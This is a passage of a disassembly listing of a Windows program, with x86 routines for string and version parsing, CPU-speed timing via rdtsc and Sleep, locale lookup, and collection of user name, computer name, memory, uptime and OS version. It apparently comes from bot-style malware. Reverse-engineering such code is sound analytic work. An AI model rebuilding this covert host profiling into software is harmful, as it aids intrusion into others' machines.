movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407C15
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C15: ; CODE XREF: sub_407BF5+1C�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C28
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C28: ; CODE XREF: sub_407BF5+29�j
jmp short loc_407BF8
; ---------------------------------------------------------------------------
loc_407C2A: ; CODE XREF: sub_407BF5+12�j
; sub_407BF5+1E�j ...
pop ebp
retn
sub_407BF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C2C proc near ; CODE XREF: sub_4083AD+2F2�p
; sub_40CA29+91�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_407C49
; ---------------------------------------------------------------------------
loc_407C42: ; CODE XREF: sub_407C2C+31�j
; sub_407C2C:loc_407CCD�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407C49: ; CODE XREF: sub_407C2C+14�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C68
cmp [ebp+var_C], 0
jz short loc_407C5F
jmp short loc_407C42
; ---------------------------------------------------------------------------
loc_407C5F: ; CODE XREF: sub_407C2C+2F�j
mov [ebp+var_C], 1
jmp short loc_407C6C
; ---------------------------------------------------------------------------
loc_407C68: ; CODE XREF: sub_407C2C+29�j
and [ebp+var_C], 0
loc_407C6C: ; CODE XREF: sub_407C2C+3A�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407CCD
cmp [ebp+arg_8], 0
jz short loc_407CCB
cmp [ebp+var_8], 0
jz short loc_407CCB
loc_407C9C: ; CODE XREF: sub_407C2C:loc_407CC9�j
push 1
pop eax
test eax, eax
jz short loc_407CCB
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
and byte ptr [eax], 0
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407CC7
cmp [ebp+var_8], 0
jnz short loc_407CC9
loc_407CC7: ; CODE XREF: sub_407C2C+93�j
jmp short loc_407CCB
; ---------------------------------------------------------------------------
loc_407CC9: ; CODE XREF: sub_407C2C+99�j
jmp short loc_407C9C
; ---------------------------------------------------------------------------
loc_407CCB: ; CODE XREF: sub_407C2C+68�j
; sub_407C2C+6E�j ...
jmp short locret_407CD2
; ---------------------------------------------------------------------------
loc_407CCD: ; CODE XREF: sub_407C2C+62�j
jmp loc_407C42
; ---------------------------------------------------------------------------
locret_407CD2: ; CODE XREF: sub_407C2C:loc_407CCB�j
leave
retn
sub_407C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CD4 proc near ; CODE XREF: sub_407D42+5F�p
; sub_407D42+79�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407CE5
; ---------------------------------------------------------------------------
loc_407CDE: ; CODE XREF: sub_407CD4+68�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407CE5: ; CODE XREF: sub_407CD4+8�j
cmp [ebp+var_4], 4
jge short loc_407D3E
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 2Eh
jnz short loc_407D0E
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D0E: ; CODE XREF: sub_407CD4+23�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407D2C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D2C: ; CODE XREF: sub_407CD4+45�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_407CDE
; ---------------------------------------------------------------------------
loc_407D3E: ; CODE XREF: sub_407CD4+15�j
xor eax, eax
locret_407D40: ; CODE XREF: sub_407CD4+38�j
; sub_407CD4+56�j
leave
retn
sub_407CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D42 proc near ; CODE XREF: sub_407F3D+19�p
; sub_407F3D+3F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push 2Eh
push [ebp+arg_0]
call sub_4078E6
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 3
jle short loc_407D63
xor eax, eax
jmp locret_407E0A
; ---------------------------------------------------------------------------
loc_407D63: ; CODE XREF: sub_407D42+18�j
mov eax, [ebp+arg_10]
and byte ptr [eax], 0
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_407DE9
cmp [ebp+var_8], 1
jz short loc_407DCF
cmp [ebp+var_8], 2
jz short loc_407DB5
cmp [ebp+var_8], 3
jz short loc_407D9B
jmp short loc_407E08
; ---------------------------------------------------------------------------
loc_407D9B: ; CODE XREF: sub_407D42+55�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DB5
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DB5: ; CODE XREF: sub_407D42+4F�j
; sub_407D42+6D�j
push [ebp+arg_0]
push [ebp+arg_8]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DCF
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DCF: ; CODE XREF: sub_407D42+49�j
; sub_407D42+87�j
push [ebp+arg_0]
push [ebp+arg_C]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DE9
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DE9: ; CODE XREF: sub_407D42+43�j
; sub_407D42+A1�j
push [ebp+arg_0]
push [ebp+arg_10]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407E03
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E03: ; CODE XREF: sub_407D42+BB�j
push 1
pop eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E08: ; CODE XREF: sub_407D42+57�j
xor eax, eax
locret_407E0A: ; CODE XREF: sub_407D42+1C�j
; sub_407D42+71�j ...
leave
retn
sub_407D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0C proc near ; CODE XREF: sub_407F3D+A3�p
; sub_407F3D+C1�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 72h
jnz short loc_407E4A
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_407E4A
push 0Ah
push [ebp+arg_C]
push 0FFh
push 0
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
mov eax, [ebp+arg_10]
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407E4A: ; CODE XREF: sub_407E0C+D�j
; sub_407E0C+18�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 73h
jz short loc_407E64
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz loc_407EF9
loc_407E64: ; CODE XREF: sub_407E0C+47�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz loc_407EF9
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407EB3
cmp [ebp+arg_10], 0
jz short loc_407EB3
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
movzx eax, al
inc eax
mov [ebp+var_4], al
push 0Ah
push [ebp+arg_C]
movzx eax, [ebp+var_4]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
inc eax
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407EB3: ; CODE XREF: sub_407E0C+6F�j
; sub_407E0C+75�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407ECC
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407ECC: ; CODE XREF: sub_407E0C+AF�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz short loc_407EE8
push offset dword_418F50
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407EE8: ; CODE XREF: sub_407E0C+C9�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_407EF5: ; CODE XREF: sub_407E0C+BE�j
; sub_407E0C+DA�j
xor eax, eax
jmp short locret_407F3B
; ---------------------------------------------------------------------------
loc_407EF9: ; CODE XREF: sub_407E0C+52�j
; sub_407E0C+61�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F12
push [ebp+arg_4]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F12: ; CODE XREF: sub_407E0C+F5�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F2B
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F2B: ; CODE XREF: sub_407E0C+10E�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_407F38: ; CODE XREF: sub_407E0C+104�j
; sub_407E0C+11D�j
mov eax, [ebp+arg_10]
locret_407F3B: ; CODE XREF: sub_407E0C+39�j
; sub_407E0C+A2�j ...
leave
retn
sub_407E0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F3D proc near ; CODE XREF: sub_41349C+192�p
; sub_41349C+3DA�p
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 44h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F69
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F69: ; CODE XREF: sub_407F3D+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F8F
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F8F: ; CODE XREF: sub_407F3D+49�j
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push offset dword_41F018
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407FB7
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FB7: ; CODE XREF: sub_407F3D+71�j
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_407FC6
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FC6: ; CODE XREF: sub_407F3D+80�j
mov [ebp+var_18], 1
push [ebp+var_18]
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_44]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_20]
push eax
push offset dword_418F54
push [ebp+arg_8]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_408068: ; CODE XREF: sub_407F3D+27�j
; sub_407F3D+4D�j ...
leave
retn
sub_407F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40806A proc near ; CODE XREF: sub_41349C+12A�p
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_408096
xor eax, eax
jmp locret_40813A
; ---------------------------------------------------------------------------
loc_408096: ; CODE XREF: sub_40806A+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_41F018
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_4080BB
xor eax, eax
jmp short locret_40813A
; ---------------------------------------------------------------------------
loc_4080BB: ; CODE XREF: sub_40806A+4B�j
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_4080D2
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_4080D2: ; CODE XREF: sub_40806A+57�j
movsx eax, [ebp+var_1C]
test eax, eax
jnz short loc_4080E9
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_4080E9: ; CODE XREF: sub_40806A+6E�j
movsx eax, [ebp+var_20]
test eax, eax
jnz short loc_408100
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_20]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408100: ; CODE XREF: sub_40806A+85�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_408117
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408117: ; CODE XREF: sub_40806A+9C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push offset dword_418F54
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_40813A: ; CODE XREF: sub_40806A+27�j
; sub_40806A+4F�j
leave
retn
sub_40806A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40813C proc near ; CODE XREF: sub_407928+54�p
; sub_407928+9D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_408150
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_408150: ; CODE XREF: sub_40813C+A�j
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_8], eax
jmp short loc_408161
; ---------------------------------------------------------------------------
loc_40815A: ; CODE XREF: sub_40813C:loc_4081A0�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408161: ; CODE XREF: sub_40813C+1C�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081A2
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_408171: ; CODE XREF: sub_40813C+56�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_408194
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_408194
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_408171
; ---------------------------------------------------------------------------
loc_408194: ; CODE XREF: sub_40813C+3D�j
; sub_40813C+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081A0
jmp short loc_4081A2
; ---------------------------------------------------------------------------
loc_4081A0: ; CODE XREF: sub_40813C+60�j
jmp short loc_40815A
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_40813C+2D�j
; sub_40813C+62�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_4081AE: ; CODE XREF: sub_40813C:loc_4081F5�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081F7
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_4081D7
mov eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_40813C+8A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081F5
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_4081F5: ; CODE XREF: sub_40813C+AA�j
jmp short loc_4081AE
; ---------------------------------------------------------------------------
loc_4081F7: ; CODE XREF: sub_40813C+7A�j
; sub_40813C+99�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov eax, [ebp+var_8]
sub eax, [ebp+var_C]
neg eax
sbb eax, eax
and eax, [ebp+var_8]
leave
retn
sub_40813C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40820E proc near ; CODE XREF: sub_40821B:loc_408221�p
; sub_40821B+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40820E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40821B proc near ; CODE XREF: sub_4083AD+3A4�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
loc_408221: ; CODE XREF: sub_40821B+4A�j
; sub_40821B+55�j
call sub_40820E
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h
call ds:dword_41709C ; Sleep
call sub_40820E
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 186A0h
push edx
push eax
call sub_416C90
push 0
push 0Ah
push edx
push eax
call sub_416C90
mov [ebp+var_8], eax
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
ja short loc_408221
jb short loc_408272
cmp [ebp+var_8], 0F4240h
ja short loc_408221
loc_408272: ; CODE XREF: sub_40821B+4C�j
push 0
push 64h
push [ebp+var_4]
push [ebp+var_8]
call sub_416C10
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
and [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_4082AB
jb short loc_4082A0
cmp [ebp+var_18], 50h
jnb short loc_4082AB
loc_4082A0: ; CODE XREF: sub_40821B+7D�j
mov [ebp+var_10], 4Bh
and [ebp+var_C], 0
loc_4082AB: ; CODE XREF: sub_40821B+7B�j
; sub_40821B+83�j
cmp [ebp+var_14], 0
ja short loc_4082C4
jb short loc_4082B9
cmp [ebp+var_18], 47h
jnb short loc_4082C4
loc_4082B9: ; CODE XREF: sub_40821B+96�j
mov [ebp+var_10], 42h
and [ebp+var_C], 0
loc_4082C4: ; CODE XREF: sub_40821B+94�j
; sub_40821B+9C�j
cmp [ebp+var_14], 0
ja short loc_4082DD
jb short loc_4082D2
cmp [ebp+var_18], 37h
jnb short loc_4082DD
loc_4082D2: ; CODE XREF: sub_40821B+AF�j
mov [ebp+var_10], 32h
and [ebp+var_C], 0
loc_4082DD: ; CODE XREF: sub_40821B+AD�j
; sub_40821B+B5�j
cmp [ebp+var_14], 0
ja short loc_4082F6
jb short loc_4082EB
cmp [ebp+var_18], 26h
jnb short loc_4082F6
loc_4082EB: ; CODE XREF: sub_40821B+C8�j
mov [ebp+var_10], 21h
and [ebp+var_C], 0
loc_4082F6: ; CODE XREF: sub_40821B+C6�j
; sub_40821B+CE�j
cmp [ebp+var_14], 0
ja short loc_40830F
jb short loc_408304
cmp [ebp+var_18], 1Eh
jnb short loc_40830F
loc_408304: ; CODE XREF: sub_40821B+E1�j
mov [ebp+var_10], 19h
and [ebp+var_C], 0
loc_40830F: ; CODE XREF: sub_40821B+DF�j
; sub_40821B+E7�j
cmp [ebp+var_14], 0
ja short loc_408325
jb short loc_40831D
cmp [ebp+var_18], 0Ah
jnb short loc_408325
loc_40831D: ; CODE XREF: sub_40821B+FA�j
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408325: ; CODE XREF: sub_40821B+F8�j
; sub_40821B+100�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_4]
sbb ecx, [ebp+var_14]
add eax, [ebp+var_10]
adc ecx, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_8]
leave
retn
sub_40821B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408342 proc near ; CODE XREF: sub_40D043+156�p
; sub_40D871+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1Fh
push [ebp+arg_0]
push 7
push 400h
call ds:dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
cmp [ebp+var_4], 0
jz short loc_408381
push offset off_419100
push [ebp+arg_0]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_4083A8
loc_408381: ; CODE XREF: sub_408342+2A�j
push 1Fh
push [ebp+arg_0]
push 7
push 800h
call ds:dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
mov eax, [ebp+var_4]
jmp short locret_4083AB
; ---------------------------------------------------------------------------
loc_4083A8: ; CODE XREF: sub_408342+3D�j
push 1
pop eax
locret_4083AB: ; CODE XREF: sub_408342+64�j
leave
retn
sub_408342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083AD proc near ; DATA XREF: sub_4087C4+35�o
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = dword ptr -73Ch
var_738 = dword ptr -738h
var_734 = byte ptr -734h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_714 = dword ptr -714h
var_710 = dword ptr -710h
var_70C = dword ptr -70Ch
var_708 = byte ptr -708h
var_6F0 = dword ptr -6F0h
var_6EC = dword ptr -6ECh
var_6E8 = dword ptr -6E8h
var_6E4 = dword ptr -6E4h
var_6E0 = byte ptr -6E0h
var_6D0 = dword ptr -6D0h
var_6CC = dword ptr -6CCh
var_6C8 = byte ptr -6C8h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_514 = dword ptr -514h
var_510 = dword ptr -510h
var_50C = byte ptr -50Ch
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_409 = byte ptr -409h
var_408 = byte ptr -408h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 750h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_6CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_734]
push eax
call ds:dword_4170C4 ; GlobalMemoryStatus
mov eax, [ebp+var_72C]
add eax, 100000h
shr eax, 14h
mov [ebp+var_6F0], eax
mov eax, [ebp+var_728]
add eax, 100000h
shr eax, 14h
mov [ebp+var_738], eax
call sub_4092A4
mov [ebp+var_714], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_6E8], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_6E4], eax
mov [ebp+var_8], 15h
mov [ebp+var_6D0], 10h
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_708]
push eax
call ds:dword_417018 ; GetUserNameA
lea eax, [ebp+var_6D0]
push eax
lea eax, [ebp+var_6E0]
push eax
call ds:dword_417078 ; GetComputerNameA
mov [ebp+var_520], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_51C]
rep stosd
lea eax, [ebp+var_520]
push eax
call ds:dword_417030 ; GetVersionExA
mov [ebp+var_48C], offset a? ; "?"
mov [ebp+var_710], offset aNoSp ; "no SP"
cmp [ebp+var_51C], 4
jnz short loc_408522
cmp [ebp+var_518], 0
jnz short loc_408522
cmp [ebp+var_510], 1
jnz short loc_40850A
mov [ebp+var_48C], offset a95 ; "95"
loc_40850A: ; CODE XREF: sub_4083AD+151�j
cmp [ebp+var_510], 2
jnz short loc_40851D
mov [ebp+var_48C], offset aNt ; "NT"
loc_40851D: ; CODE XREF: sub_4083AD+164�j
jmp loc_4085B6
; ---------------------------------------------------------------------------
loc_408522: ; CODE XREF: sub_4083AD+13F�j
; sub_4083AD+148�j
cmp [ebp+var_51C], 4
jnz short loc_408540
cmp [ebp+var_518], 0Ah
jnz short loc_408540
mov [ebp+var_48C], offset a98 ; "98"
jmp short loc_4085B6
